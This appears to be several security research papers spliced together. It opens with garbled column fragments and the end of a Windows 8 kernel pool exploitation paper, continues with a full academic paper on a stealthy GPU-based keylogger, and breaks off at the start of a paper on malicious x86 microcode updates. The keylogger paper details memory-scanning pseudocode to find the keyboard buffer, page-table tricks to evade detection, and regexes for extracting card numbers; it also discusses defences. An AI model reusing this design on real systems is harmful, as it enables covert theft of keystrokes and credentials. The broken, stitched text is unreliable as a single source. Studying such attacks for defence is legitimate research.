g, the allocat o
nk, while retu
k that was alre
cate the free
size attack is t
ed pool chun k
ory freed (e.g
e may be a ri
ernals are 
. 
 
tion 
or 
rning 
eady 
d 
that 
k 
. in 
sk of 
85 | Windows  8 Heap Internals 
 Kernel	Land	Conclusion 	
The Windows  8 kernel pool improves  in many areas over previous versions of Windows  and raises the 
bar for exploitation  once again. Although there are no significant  changes to its algorithms  and 
structures,  the array of security improvements  now make generic kernel pool attacks somewhat  a lost 
art of the past. Specifically,  the addition of proper safe linking and unlinking,  and the use of randomized  
cookies to encode and protect pointers prevent an attacker from targeting metadata,  used to carry out 
simple, yet highly effective kernel pool attacks. However,  as the pool header remains unprotected,  there 
may still be situations  where an attacker can target header data such as block size values in order to 
make less exploitable  vulnerabilities  somewhat  more useful. Although such attacks require an attacker 
to manipulate  the kernel pool with a high degree of control, the allocator possesses  a high degree of 
determinism  due to its continued  use of lookaside  lists and bias towards efficiency.  That said, the 
increased  difficulty and skillset required in reliably exploiting  pool corruption  vulnerabilities  in Windows  
8, suggests that these types of attacks will be fewer and farther between.  
 
Thanks	
We’d like to thank the following  people for their help. 
 Jon Larimer (@shydemeanor)  
 Dan Rosenberg  (@djrbliss)  
 Mark Dowd (@mdowd)  
 
   
86 | Windows  8 Heap Internals 
 Bibliography 	
  Jurczyk, Mateusz ‘j00ru’ ‐ Reserve Objects in Windows  7 (Hack in the Box Magazine)  
Hawkes, Ben. 2008. Attacking  the Vista Heap. Ruxcon 2008 / Blackhat USA 2008, 
   http://www.lateralsecurity.co m/downloads/hawkes_ruxcon ‐nov‐2008.pdf 
Ionescu, Alex – Int 0x29 
   http://www.alex ‐ionescu.com/?p=69  
Kortchinsky,  Kostya – Real World Kernel Pool Exploitation  
   http://sebug.net/paper/Meeting ‐Documents/syscanhk/KernelPool.pdf  
Mandt, Tarjei. 2011, “Modern Kernel Pool Exploitation”  
  http://www.mista.nu/research/kernelpool_infiltrate2011.pdf  
Moore, Brett, 2008 “Heaps about Heaps” 
  http://www.insomniasec.com/public ations/Heaps_About_Heaps.ppt  
Phrack 68 “The Art of Exploitation:  MS IIS 7.5 Remote Heap Overflow”  
  http://www.phrack.org/issues.html?issue=68&id=12#article  
SMP, “Symmetric  multiprocessing”  
  http://en.wikipedia.org/wiki/Symmetric_multiprocessing   
Valasek, Chris. 2010, “Understanding  the Low Fragmentation  Heap” 
  http://illmatics.com/U nderstanding_the_LFH.pdf  
  http://illmatics.com/Unders tanding_the_LF H_Slides.pdf  
Varghese  George, Tom Piazza, Hong Jiang ‐ Technology  Insight: Intel Next Generation  
Microarchitecture  Codenamed  Ivy Bridge 
  http://www.intel.com/idf/library/pdf/sf_2011/SF11_SPCS005_101F.pdf   
 You Can Type, but You Can’t Hide: A Stealthy
GPU-based Keylogger
Evangelos Ladakis,*Lazaros Koromilas,*Giorgos Vasiliadis,*
Michalis Polychronakis,†Sotiris Ioannidis*
*Institute of Computer Science, Foundation for Research and Technology—Hellas, Greece
†Columbia University, USA
{ladakis, koromil, gvasil, sotiris}@ics.forth.gr, mikepo@cs.columbia.edu
ABSTRACT
Keyloggers are a prominent class of malware that harvests
sensitive data by recording any typed in information. Key-
logger implementations strive to hide their presence using
rootkit-like techniques to evade detection by antivirus and
other system protections. In this paper, we present a new
approach for implementing a stealthy keylogger: we explore
the possibility of leveraging the graphics card as an alterna-
tive environment for hosting the operation of a keylogger.
The key idea behind our approach is to monitor the system’s
keyboard buffer directly from the GPU via DMA, without
any hooks or modifications in the kernel’s code and data
structures besides the page table. The evaluation of our pro-
totype implementation shows that a GPU-based keylogger
can effectively record all user keystrokes, store them in the
memory space of the GPU, and even analyze the recorded
data in-place, with negligible runtime overhead.
1. INTRODUCTION
Keyloggers are one of the most serious types of malware
that surreptitiously log keyboard activity, and typically exfil-
trate the recorded data to third parties [12]. Despite signifi-
cantresearch andcommercial efforts[16,17,21,22], keyloggers
still pose an important threat of stealing personal and finan-
cial information [1]. Keyloggers can be implemented as tiny
hardware devices [2,3], or more conveniently, in software [4].
Software keyloggers can be implemented either at the user
or kernel level. User-level keyloggers generally use high-level
APIs to monitor keystrokes. For example, Windows provides
theGetAsyncKeyState function to determine whether a
key is pressed or not at the time the function is called, and
whether the key was pressed after a previous call. User-space
keyloggers, while easy to write, are also relatively easy to
detect, using hook-based techniques [28]. In contrast, kernel
level keyloggers run inside the OS kernel and record all data
originating from the keyboard. Typically, a kernel level
keylogger hooks specific system calls or driver functions. The
injected malicious code is programmed to capture all user
Permission to make digital or hard copies of all or part of this work for
personal or classroom use is granted without fee provided that copies are
not made or distributed for profit or commercial advantage and that copies
bear this notice and the full citation on the first page. To copy otherwise, to
republish, to post on servers or to redistribute to lists, requires prior specific
permission and/or a fee.
EuroSec’13 April 14 2013, Prague, Czech Republic
Copyright 2013 ACM 978-1-4503-2120-4/13/04 ...$15.00.keystrokespassedthroughthehookedfunctioncall. Although
kernel-level keyloggers are more sophisticated and stealthy
than user-level keyloggers, they heavily rely on kernel code
modifications, and thus can be detected by kernel integrity
and code attestation tools [25,26].
In this paper, we present how malware can tap the general-
purpose computation capability of modern graphics proces-
sors to increase the stealthiness of keylogging. By instructing
the GPU to carefully monitor via DMA the physical page
where the keyboard buffer resides, a GPU-based keylogger
can record all user keystrokes and store them in the memory
space of the GPU. An important property of our keylogger is
that it does not rely on any kernel modifications besides alter-
ing the page table, and uses a small code snippet that needs
to run just once from kernel context to acquire the physical
address of the keyboard buffer. This code is completely stan-
dalone, does not require any hooks or other modifications,
and is completely removed after it accomplishes its task.
The physical address of the keyboard buffer is then used by
the GPU to monitor all user keystrokes directly via DMA,
through the direction of a user-level controller process.
We have implemented and evaluated our prototype GPU-
based keylogger for Linux and the 32-bit x86 architecture.
The results of our evaluation demonstrate the efficiency and
effectiveness of GPUs for capturing short-lived data from the
host memory, while keeping the CPU and GPU utilization
at minimal levels, in our case about 0.1%.
The main contributions of this work are:
•We present the first (to the best of our knowledge)
GPU keylogger, capable of monitoring all keystroke
events and storing them in the GPU memory.
•We have experimentally evaluated our GPU-based key-
logger and demonstrate that it can be used effectively
and efficiently for capturing all keystroke events. By
carefully scheduling the GPU kernel invocations, the
keylogger can capture all keystroke events without af-
fecting the proper rendering of the graphics and with
minimal overhead.
2. BACKGROUND
General-purpose computing on graphics processing units
has drastically evolved during the last few years. Historically,
the GPU has been used for handling 2D and 3D graphics
rendering, effectively offloading the CPU from these compu-
tationally intensive operations. Driven to a large extent by
the ever-growing video game industry, graphics processors
have been constantly evolving, increasing both in compu-
tational power and in the range of supported operations
and functionality. Meanwhile, programmers began exploring
ways for enabling their applications to take advantage of the
massively parallel architecture of modern GPUs.
Standard graphics APIs such as OpenGL and DirectX, do
not expose much of the underlying computational capabilities
that graphics hardware can provide. Data and variables have
to be mapped to graphics objects, while algorithms must be
expressed as pixel or vertex shaders. The Compute Unified
Device Architecture (CUDA) introduced by NVIDIA [20] is a
significant advance, exposing several hardware features that
are not available via the graphics API.1CUDA consists of a
minimal set of extensions to the C language and a runtime
library that provides functions to control the GPU from the
host, as well as device-specific functions and data types.
At the top level, an application written for CUDA consists
of a serial program running on the CPU, and a parallel part,
called a kernel, that runs on the GPU. A kernel, however, can
only be invoked by a parent process running on the CPU. As
a consequence, a kernel cannot be initiated as a stand-alone
application, and it strongly depends on the CPU process
that invokes it. Each kernel is executed on the device as
many different threadsorganized in thread blocks. Thread
blocks are executed by the multiprocessors of the GPU in
parallel. In addition to program execution, CUDA also
provides appropriate functions for data exchange between
the host and the device. All I/O transactions are performed
via DMA over the PCI Express bus. DMA enables the GPU
to trasfer data directly—without any CPU involvement—to
and from the host memory, using a dedicated DMA engine.
Typically, the GPU can only access specific memory regions,
allocated by the operating system.
Given the great potential of general-purpose computing
on graphics processors, it is only natural to expect that
malware authors would attempt to tap the powerful features
of modern GPUs to their benefit [24,32]. The ability to
execute general purpose code on the GPU opens a whole new
window of opportunity for malware authors to significantly
raise the bar against existing defenses. Existing malicious
code analysis systems primarily support x86 code, while
current virus scanning tools cannot detect malicious code
storedinseparatedevicememoryandexecutedonaprocessor
other than the CPU. In addition, the majority of security
researchers are not familiar with the execution environment
and the instruction set of graphics processors.
A GPU-assisted malware binary contains code destined to
run on different processors. Upon execution, the malware
loads the device-specific code on the GPU, allocates a mem-
ory area accessible by both the CPU and the GPU, initializes
it with any shared data, and schedules the execution of the
GPU code. Depending on the design, the flow of control can
either switch back and forth between the CPU and the GPU,
or separate tasks can run in parallel on both processors.
A major advantage for malware authors is that the major-
ity of current video card manufacturers, representing about
99% of the worldwide graphics cards market share [5], do
provide support for GPGPU computations. Consequently,
GPU-based malware can have a large infection ratio with-
out being inhibited by unsupported graphics processors. In
addition, the execution of GPU code and data transfers
between the host and the device do not require any adminis-
1AMD and Intel offer similar SDKs for its ATI line of GPUs
and the Intel HD Graphics 4000/2500 .
kernel module
controller
processmemory
scannerGPU
code
start
keyloggermanipulate
page table entries
locate
buffer
scan
pages
12 3 4Figure 1: Temporary and permanent components
of the keylogger. Gray denotes bootstrapping oper-
ations, while black denotes monitoring functions.
trator privileges. In other words, depending on its purpose,
GPU-assisted malware can run successfully even under user
privileges, making it more robust and deployable.
3. GPU-BASED KEYLOGGING
In this section we present in detail the design of a proof-
of-concept keylogger implemented on the GPU. Instead of
relying on rootkit-like techniques, such as hooking system
functions and manipulating critical data structures, our key-
logger monitors the contents of the system’s keyboard buffer
directly from the GPU.
One of the primary challenges of this design is how to
locate the memory address of the keyboard buffer, as (i)
the keyboard buffer is not exported in the kernel’s symbol
table, making it not accessible directly by loadable modules,
and(ii)the memory space allocated for data structures is
different after every system boot or after unplugging and
plugging back in the device. Typically, loadable modules
allocate memory dynamically, hence object addresses are not
necessarily the same after a system reboot. In addition, the
OS can apply certain randomization algorithms to hinder an
attacker that tries to predict an object’s address.
To overcome the randomized placement of the keyboard
buffer, the attacker has to scan the whole memory. As a
consequence, our GPU-based keystroke logger consists of
two main components: (i)a CPU-based component that
is executed once, at the bootstrap phase, with the task of
locating the address of the keyboard buffer in main memory,
and(ii)a GPU-based component that monitors, via DMA,
thekeyboardbufferandrecords allkeystrokeevents. Figure1
displays the bootstrapping (gray) and monitoring (black)
components of the system, along with the sequence of their
interactions.
3.1 Locating the Keyboard Buffer
In Linux, an attached USB device is represented by a USB
RequestBlock(URB)structure,definedinthe linux/usb.h
header file of the Linux source tree. Figure 2 shows the
fields of the USB Request Block structure that are relevant
for our work. For a USB keyboard device, in particular,
the keyboard buffer is part of the URB structure, in the
field transfer_buffer . Unfortunately, the memory offset
where the URB structure is placed is different every time
the system restarts. To locate the exact offset of the key-
board buffer (Figure 1, step 1), we have to scan the whole
memory sequentially [30]. However, modern OSes, including
Linux and Windows, do not allow users to access memory
regions that have not been assigned to them. An access to a
page that is not mapped to a process’ virtual address space
...
struct usb_device *dev
...
void *transfer_buffer
dma_addr_t *transfer_dma
...
u32 *transfer_buffer_length
...
Figure 2: Fields of interest in the USB Request
Block (URB) structure.
is typically considered illegal, resulting in a segmentation
fault. To access the memory regions where the OS kernel
and data structures reside, the memory scanning phase of
the keylogger needs to run with administrative privileges.
Linux offers the /dev/mem and/dev/kmem special files
to allow a privileged user to access the physical memory and
the kernel virtual memory, respectively. For security reasons
though, recent distributions disable them by default; access
to the /dev/mem and/dev/kmem files is allowed only if the
Linux kernel has been explicitly compiled without the option
CONFIG_STRICT_DEVMEM=y . Instead, wehaveimplemented
a loadable kernel module (LKM) that scans the whole main
memory of the host (Figure 1, step 2). The kernel module
uses the same mechanism as the /dev/mem character device
to implement access to physical pages.
The pseudocode for scanning the low memory addresses
of a 32-bit x86 system is shown in Figure 3. This approach
is sufficient for memory allocated using kmalloc() , which
always returns kernel virtual addresses that have a physi-
cal mapping (logical addresses) [8]. To locate the keyboard
buffer, we begin to search for pointers to USB device struc-
tures. Suchpointersarememory-alignedto0x400boundaries,
and the corresponding transfer_dma fields are aligned to
0x20 boundaries. If both conditions are true, we check if
theproduct field contains any of the substrings “usb” and
“keyboard” (for wired USB keyboards), or “usb” and “re-
ceiver” (for wireless keyboard/mouse sets). As a final step,
we check that the field transfer_buffer_length contains
the appropriate length (8 bytes) and that it contains valid
keystroke values, e.g., all bytes are zero if no key is pressed.
For 32-bit systems, in which the kernel address space is at
most 1 GB, the total search time in the worst case is just
about 3.2 seconds.2
3.2 Capturing Keystrokes
Having located the memory address of the buffer used
by the keyboard device driver, the next step is to configure
the GPU to constantly monitor its contents for changes.
To achieve this, the GPU must have access to the kernel’s
keyboard buffer. NVIDIA CUDA devices share a unified
address space with the host controller process that manages
the GPU [20]. Consequently, to be accessible directly by the
GPU, the keyboard buffer must be mapped in the virtual
address space of the host process. This can be achieved
by manipulating the page table of the controller process
to include the page in which the keyboard buffer resides
(Figure 1, step 3).
During the initialization phase, the controller process ac-
2In 64-bit architectures, where the kernel virtual address
space can be larger than 1 GB, the search time grows linearly
and is proportional to the size of the physical memory.#define __va(x) ((void *)((unsigned long)(x)+PAGE_OFFSET))
for (i = 0; i < totalmem; i += 0x10) {
struct urb *urbp = (struct urb *)__va(i);
if (((urbp->dev % 0x400) == 0) &&
((urbp->transfer_dma % 0x20) == 0) &&
(urbp->transfer_buffer_length == 8) &&
(urbp->transfer_buffer != NULL) &&
strncmp(urbp->dev->product, "usb", 32) &&
strncmp(urbp->dev->product, "keyboard", 32)) {
/*potential match */
}
}
Figure 3: Pseudocode for locating the keyboard
buffer. Whenever the condition of the if-statement
is true, a potential URB structure of interest has
been found. We verify whether a matching struc-
ture corresponds to the keyboard device by check-
ing if the content of the transfer_buffer field con-
forms to the appropriate format, i.e., contains valid
keystroke values.
quires a dummy memory page using the mmap() system call.
After the completion of the scanning phase, the bootstrap-
ping kernel module locates the controller process’ page table
and changes the virtual mapping of the dummy page to point
to the physical page that contains the keyboard buffer. After
the GPU begins monitoring the buffer (Figure 1, step 4),
the controller process immediately releases the page using
munmap() . By doing so, the controller process does not
account for that page any longer, allowing it to evade poten-
tial anomaly detection tools that check for suspicious page
table mappings. Note that this does not affect the ability of
the GPU to access the keyboard buffer, as it uses physical
addressing through DMA, without any CPU intervention.
In essence, the virtual mapping is only initially required to
“trick” the CUDA API to allow DMA access to a physical
page that otherwise would not be accessible.
To capture keystroke events, the GPU constantly monitors
the buffer for changes. As we discuss in Section 4, an interval
of less than 100 ms allows the recording of all keystrokes even
for fast typists, with minimal runtime overhead and without
adding any contention due to consecutive accesses. The size
of the buffer is eight bytes.3The first byte corresponds to the
scancodes of modifier keys, such as Alt,Shift, and Ctrl.
If more than one modifiers are active at the same time, this
value is encoded as the sum of the individual scancodes. The
second byte has no special use. The last six bytes represent
the scancodes of the rest of the pressed keys. At any given
moment, the buffer may contain one to six non-zero bytes
that represent the pressed keys. Whenever a user presses
a key (or a combination of keys), the corresponding scan
codes are written in the buffer, and remain there as long as
the key(s) are pressed. By the time the user releases the
key(s), the corresponding values are zeroed. An error state
occurs when several keys are pressed simultaneously, and is
represented by two zeroes followed by six ones.
Captured keystrokes are translated from raw scan codes
into ASCII characters using a simple dispatcher, and are
stored in the device memory of the GPU. Modern GPUs con-
3In Linux, the usbhid keyboard driver allocates an 8-byte
memory area for the transfer_buffer field of the USB
Request Block that is used to handle the keyboard interrupts.
 0.01 0.1 1 10 100
 0.001  0.01  0.1  1  10  100  1000CPU utilization (percent)
Kernel invocation interval (msecs)Figure 4: CPU utilization of the keylogger for dif-
ferent GPU kernel invocation intervals.
10-610-510-410-3 0.01 0.1
 0.001  0.01  0.1  1  10  100  1000GPU utilization (percent)
Kernel invocation interval (msecs)
Figure 5: GPU utilization of the keylogger for dif-
ferent GPU kernel invocation intervals.
tain from many hundreds of MBs, up to 2–3 GBs of memory,
which is plenty for storing the recorded keystrokes. Further-
more, the parallel capabilities of modern GPUs can also be
exploited to analyze the captured data, e.g., for extracting
sensitive data such as credit card numbers and web-banking
credentials. We have implemented a very simple module
that performs regular expression matching—using an exist-
ing GPU-based pattern matching implementation [33]—over
the recorded keystrokes periodically. As shown in Section 4,
the GPU is capable of matching tens of MBs in less time
than the time needed for a single user key press.
4. EVALUATION
To evaluate our prototype GPU-based keylogger, we used
a commodity desktop equipped with an Intel E6750 Dual-
Core CPU at 2.66GHz and 4GB of main memory. We use
several NVIDIA graphics cards: both low-end (GT630) and
high-end (GTX480). Our desktop runs Ubuntu Linux 12.10
with kernel v3.5.0. We measure GPU execution times using
CUDA’s command line profiler facilities [19].
In our first experiment, we measure the CPU and GPU
utilization of the keylogger. The CPU time corresponds to
the controller process, which periodically just makes a simple
function call, provided by the GPU driver, instructing the
GPU to invoke the keylogging GPU kernel function. The
GPU kernel function reads the keyboard event buffer, oc-
casionally performs simple data analysis tasks, and returns
to the controller process, which remains idle for a speci-Type Regular Expression
VISA∧4[0−9]{12}(? : [0−9]{3})?$
MasterCard∧5[1−5][0−9]{14}$
American Express∧3[47][0−9]{13}$
Diners Club∧3(? : 0[0−5]|[68][0−9])[0−9]{11}$
Discover∧6(? : 011|5[0−9]{2})[0−9]{12}$
Table 1: Regular expressions used for matching var-
ious types of credit card numbers.
fied interval. This approach is necessary because the GPU
is also used for graphics rendering, and longer execution
times of the GPU component would affect the proper dis-
play of graphics. More importantly, current GPUs use a
non-preemptive scheduling mechanism, hence a running task
cannot be interrupted.
This introduces an interesting trade-off: As the frequency
of the GPU kernel function invocation increases, so does the
CPU and GPU overhead of the keylogger, and the risk of
affecting the proper display of graphics—an event which the
user may notice. On the other hand, less frequent kernel
invocations do not have any noticeable impact in graphics
rendering, but may result to missed keystroke events. Fig-
ures 4 and 5 show the keylogger’s CPU and GPU utilization
when varying the GPU kernel invocation interval. Typically,
the duration of a single keypress varies from 100 ms for faster
typists, to over one second for slower typists [14]. Conse-
quently, the GPU invocation interval should be kept under
100 ms, to enable accurate monitoring of all key presses,
without missed events. As shown in both figures, we have
chosen an interval of 90 ms, which has minimal performance
impact: the CPU utilization is about 0.1% (Figure 4), while
the GPU has negligible utilization of 5·10−5% (Figure 5).
The time needed by the GPU to read the contents of the
8-byte keyboard buffer over the PCIe bus is about 0.005 ms.
In the next experiment, we measure the time needed by the
GPU to scan the captured data and extract sensitive infor-
mation. Specifically, we search the recorded data for various
types of credit card numbers, using the regular expressions
shown in Table 1. Figure 6 shows the corresponding GPU
execution times for different input sizes. We observe that
the running times are below one millisecond even for buffer
sizes in the order of Megabytes. As such, the scanning over-
head is negligible, given that the average user needs several
seconds to type a few hundred of bytes. Data analysis can
be performed infrequently, e.g., after the accumulation of a
few Megabytes of new data.
5. COUNTERMEASURES
Current malware analysis and detection systems are tai-
lored to CPU architectures only, and therefore are ineffective
against GPU-based malware. Fortunately, however, mali-
cious code that runs on a GPU can be identified in several
ways. To properly identify GPU-based malware though, ex-
isting defenses need to be enhanced with new functionality
for the analysis of GPU machine code.
5.1 GPU Code Analysis
NVIDIArecentlyreleased cuda-gdb andcuda-memcheck ,
two debugger tools for CUDA applications [20]. The goal of
cuda-memcheck is to provide a lightweight mechanism for
checking runtime memory errors. The cuda-gdb is capable
of debugging in real time a CUDA application running on
the actual GPU, similarly to gdb(1). Since version 5.0,
cuda-gdb can attach to a running process, and inspect the
state of the GPU at any point. We note, however, that an
attacker could easily strip debug symbols from the malicious
code, and significantly complicate its analysis. Still, support
for basic debugging of GPU code is a crucial first step to-
ward analyzing GPU-assisted malware binaries. Analogous
situations have repeatedly occurred in the past, e.g., when-
ever popular processor architectures would be extended with
additional instructions for floating point or other special-
ized computations, which malware afterwords exploited for
hindering detection and analysis.
An important consideration for malware analysis systems
build on top of virtual machine environments [7,13,15,18,27,
35] is the proper support of GPGPU APIs, in place of basic
graphics device emulation. Virtual machine monitors usually
provide a virtualization layer between the actual graphics
card of the host system, and the emulated graphics card
presented to the guest OSes, allowing multiple VMs to access
the same device. Therefore, when running on existing virtual
machines, GPGPU applications fail to execute because the
driver of the virtual graphics device does not support any of
the GPGPU APIs. Recent works have proposed a virtualized
environment to provide GPU visibility from within virtual
machines [9 –11,29]. Unfortunately, the purpose of these
works is to allow GPU sharing among different applications,
using multiplexing and queueing mechanisms, rather than
simulating the graphics processors. The latter approach is
crucial for tracing the behaviour of a malicious GPU kernel.
5.2 Runtime Detection
A possible mechanism for the detection of GPU-assisted
malware can be based on the observation of DMA side effects.
Stewin et al. [31] have shown that DMA malware has DMA
side effects that can be reliably measured. However, the
proposed technique works for DMA malware that performs
bulk DMA transfers, e.g., continually searching the host’s
memory for valuable data to carry out an attack. As a
GPU-based keylogger does not need to perform any bulk
transfers, it is not clear if this technique could be applied as
an effective defense. Alternatively, a possible defense could
be based on profiling the GPU utilization or monitoring its
access patterns.
6. DISCUSSION
A major limitation of our prototype GPU-based keylogger
is that it requires a CPU process to control its execution. The
only purpose of the CPU code is to periodically trigger the
malicious GPU kernel, an operation that can be implemented
withafewmachineinstructions, resultinginminimalmemory
footprint. For instance, the CPU binary size of our current
prototype is less than 4 KB. This allows an attacker to easily
hide the CPU component of the keylogger by injecting its
code into the address space of an existing benign user-level
process [6,23,34].
Another limitation of our prototype implementation is that
it requires administrative privileges for initializing the envi-
ronment required to allow the GPU to monitor the keyboard
buffer. However, the code that needs to run with administra-
tive privileges is solely used for acquiring the address of the
keyboard buffer and enabling the GPU to access its physical
 0 1000 2000 3000 4000 5000 6000
4 16 64 256 1K 4K 16K 64K 256K 1M 4MGPU execution time (usec)
Buffer size (bytes)GeForce GTX 480
GeForce GT 630Figure 6: Execution times for low-end (GT630) and
high-end (GTX480) graphics cards, when extracting
credit card numbers (using the regular expressions
of Table 1) for different captured data sizes.
page, and is completely removed afterwards. In contrast to
existing rootkits and kernel-level keyloggers, it does not need
to hook any code or manipulate any data structures for hid-
ing its presence. The kernel code and data structures remain
intact, while the GPU continues to monitor all keyboard
activity. As described in Section 3, our prototype uses a
loadable kernel module to execute code within the kernel. We
should note that this choice was made only for convenience,
and the same stealthy approaches that are typically used for
the installation of kernel-level rootkits can be employed, e.g.,
by exploiting a vulnerability and injecting malicious code
directly into the kernel.
7. CONCLUSION AND FUTURE WORK
In this paper we presented a stealthy keylogger that runs
directly on a graphics processor, allowing it to evade current
protection mechanisms that run on the host CPU and are
tailored to CPU code. We have implemented and evaluated
our GPU-based keylogger on both low-end and high-end
NVIDIA graphics cards. Besides recording keystrokes, the
architecture of modern graphics processors enables our pro-
totype to benefit from their excess computational capacity
for analyzing the captured data. To demonstrate this ability,
our prototype uses the streaming processors of the GPU to
extract credit card numbers from the captured keystrokes
with negligible runtime overhead.
Currently, our GPU keylogger has a small memory foot-
print on the host memory, and minimal CPU and GPU
utilization, about 0.1%. These characteristics can signif-
icantly increase its stealthiness and raise the bar against
existing defenses.
We conclude that our GPU-based keylogger could be part
of a rootkit that, at runtime, would provide a stealthy mech-
anism for extracting sensitive data from an infected host.
Our work clearly demonstrates that additional protection
mechanisms are needed to efficiently defend against mali-
cious code executed on graphics processors. As part of our
future work, we plan to port our prototype implementation
for Windows, and explore similar techniques for performing
other malicious activities, including the acquisition of sen-
sitive data, such as cryptographic keys, credentials for web
banking accounts, web-camera snapshots, screenshots, and
open documents located in the file cache.
Acknowledgments
This work was supported in part by the FP7 projects MALCODE
and SysSec, funded by the European Commission under Grant
Agreements No. 254116 and No. 257007, and by the project For-
Too, funded by the Directorate-General for Home Affairs under
Grant Agreement No. HOME/2010/ISEC/AG/INT-002. This
publication reflects the views only of the authors, and the Com-
mission cannot be held responsible for any use which may be made
of the information contained herein. Michalis Polychronakis is
also with FORTH-ICS. Evangelos Ladakis, Giorgos Vasiliadis and
Lazaros Koromilas are also with the University of Crete.
8. REFERENCES
[1] Criminals increase their use of keyloggers, according to
experts. http://antikeyloggers.com/criminals-
increase-use-keyloggers .
[2] KeyGrabber - Hardware Keylogger - WiFi USB
hardware keyloggers. http://www.keelog.com .
[3] KeyGrabber Hardware Keylogger hardware solutions -
KeyGrabber Wi-Fi, KeyGrabber USB hardware
keyloggers. http://www.keydemon.com .
[4] Keylogger reviews, monitor software comparison, test of
best keyloggers 2013. http://www.keylogger.org .
[5] Radeons take back graphics card market share.
http://techreport.com/news/23482/radeons-
take-back-graphics-card-market-share .
[6] Anthony Lineberry. Malicious code injection via
/dev/mem, March 2009. Black Hat.
[7] U. Bayer and F. Nentwich. Anubis: Analyzing Unknown
Binaries, 2009. http://anubis.iseclab.org/ .
[8] J. Corbet, A. Rubini, and G. Kroah-Hartman. Linux
Device Drivers, 3rd Edition , chapter 15, pages 413–414.
O’Reilly, February 2005.
[9] J. Duato, A. PeÃśa, F. Silla, R. Mayo, and
E. Quintana-Orti. rcuda: Reducing the number of
gpu-based accelerators in high performance clusters. In
High Performance Computing and Simulation (HPCS),
2010 International Conference on , 2010.
[10] G. Giunta, R. Montella, G. Agrillo, and G. Coviello. A
gpgpu transparent virtualization component for high
performance computing clouds. In Proceedings of the
16th international Euro-Par conference on Parallel
processing: Part I , EuroPar’10, 2010.
[11] V. Gupta, A. Gavrilovska, K. Schwan, H. Kharche,
N. Tolia, V. Talwar, and P. Ranganathan. Gvim:
Gpu-accelerated virtual machines. In Proceedings of the
3rd ACM Workshop on System-level Virtualization for
High Performance Computing , HPCVirt ’09, 2009.
[12] T. Holz, M. Engelberth, and F. Freiling. Learning more
about the underground economy: a case-study of
keyloggers and dropzones. In Proceedings of the 14th
European conference on Research in computer security ,
ESORICS’09, 2009.
[13] M. G. Kang, P. Poosankam, and H. Yin. Renovo: a
hidden code extractor for packed executables. In
Proceedings of the 2007 ACM workshop on Recurring
Malcode (WORM) , 2007.
[14] D. Kieras. Using the Keystroke-Level Model to Estimate
Execution Times. University of Michigan , 2001.
[15] C. Kruegel, E. Kirda, and U. Bayer. Ttanalyze: A tool
for analyzing malware. In Proceedings of the 15th
European Institute for Computer Antivirus Research
Annual Conference (EICAR) , April 2006.
[16] C. Kruegel, W. Robertson, and G. Vigna. Detecting
kernel-level rootkits through binary analysis. InProceedings of the Annual Computer Security
Applications Conference (ACSAC) , 2006.
[17] D. Le, C. Yue, T. Smart, and H. Wang. Detecting kernel
level keyloggers through dynamic taint analysis.
Technical Report WM-CS-2008-05, College of William &
Mary, 2008.
[18] A. Moser, C. Kruegel, and E. Kirda. Exploring multiple
execution paths for malware analysis. In Proceedings of
the 28th IEEE Symposium on Security and Privacy ,
2007.
[19] NVIDIA. Compute Command Line Profiler User Guide,
Version 3.0 .
[20] NVIDIA. CUDA C Programming Guide, Version 5.0 .
[21] S. Ortolani and B. Crispo. Noisykey: tolerating
keyloggers via keystrokes hiding. In Proceedings of the
7th USENIX conference on Hot Topics in Security ,
HotSec’12, 2012.
[22] S. Ortolani, C. Giuffrida, and B. Crispo. Bait your hook:
a novel detection technique for keyloggers. In
Proceedings of the 13th international conference on
Recent advances in intrusion detection , RAID’10, 2010.
[23] B. Prochazka, T. Vojnar, and M. Drahanský. Hijacking
the Linux Kernel. In MEMICS , pages 85–92, 2010.
[24] D. Reynaud. GPU Powered Malware. Ruxcon 2008.
[25] A. Seshadri, M. Luk, N. Qu, and A. Perrig. Secvisor: a
tiny hypervisor to provide lifetime kernel code integrity
for commodity oses. In Proceedings of twenty-first ACM
SIGOPS symposium on Operating systems principles ,
SOSP ’07, 2007.
[26] A. Seshadri, M. Luk, E. Shi, A. Perrig, L. van Doorn,
and P. Khosla. Pioneer: verifying code integrity and
enforcing untampered code execution on legacy systems.
InProceedings of the twentieth ACM symposium on
Operating systems principles , SOSP ’05, 2005.
[27] M. Sharif, A. Lanzi, J. Giffin, and W. Lee. Automatic
reverse engineering of malware emulators. In Proceedings
of the 30th IEEE Symposium on Security and Privacy ,
2009.
[28] S. Shetty. Introduction to spyware keyloggers.
www.securityfocus.com/infocus/1829 , 2005.
[29] L. Shi, H. Chen, and J. Sun. vcuda: Gpu accelerated
high performance computing in virtual machines. In
Proceedings of the 2009 IEEE International Symposium
on Parallel&Distributed Processing , IPDPS ’09, 2009.
[30] P. Stewin and I. Bystrov. Understanding DMA Malware.
InProceedings of the 9th Conference on Detection of
Intrusions and Malware & Vulnerability Assessment .
DIMVA, Heraklion, Crete, Greece, July 2012.
[31] P. Stewin, J.-P. Seifert, and C. Mulliner. Poster:
Towards detecting dma malware. In Proceedings of the
18th ACM conference on Computer and
communications security , CCS ’11, pages 857–860, 2011.
[32] G. Vasiliadis, M. Polychronakis, and S. Ioannidis.
GPU-Assisted Malware. In Proceedings of the 5th
International Conference on Malicious and Unwanted
Software (MALWARE) , 2010.
[33] G. Vasiliadis, M. Polychronakis, and S. Ioannidis.
Parallelization and characterization of pattern matching
using GPUs. In Proceedings of the 2011 IEEE
International Symposium on Workload Characterization ,
IISWC, 2011.
[34] M. Vlad. Rootkits and Malicious Code Injection.
Journal of Mobile, Embedded and Distributed Systems ,
3(2), 2011.
[35] C. Willems, T. Holz, and F. Freiling. Toward automated
dynamic malware analysis using CWSandbox. IEEE
Security and Privacy , 5(2):32–39, 2007.Securit y Analysis of x86 Pro cessor Micro co de
Daming D. Chen
Arizona State Univ ersit y
ddchen@asu.eduGail-Jo on Ahn
Arizona State Univ ersit y
gahn@asu.edu
Decem b er 11, 2014
Abstract
Mo dern computer pro cessors con tain an em b edded rm w are kno wn as micro co de that con trols deco de
and execution of x86 instructions. Despite b eing proprietary and relativ ely obscure, this micro co de can
b e up dated using binaries released b y hardw are man ufacturers to correct pro cessor logic a ws (errata).
In this pap er, w e sho w that a malicious micro co de up date can p oten tially implemen t a new malicious in-
structions or alter the functionalit y of existing instructions, including pro cessor-accelerated virtualization
or cryptographic primitiv es. Not only is this attac k v ector capable of sub v erting all soft w are-enforced
securit y p olicies and access con trols, but it also lea v es b ehind no p ostmortem forensic evidence due to
the v olatile nature of write-only patc h memory em b edded within the pro cessor. Although sup ervisor
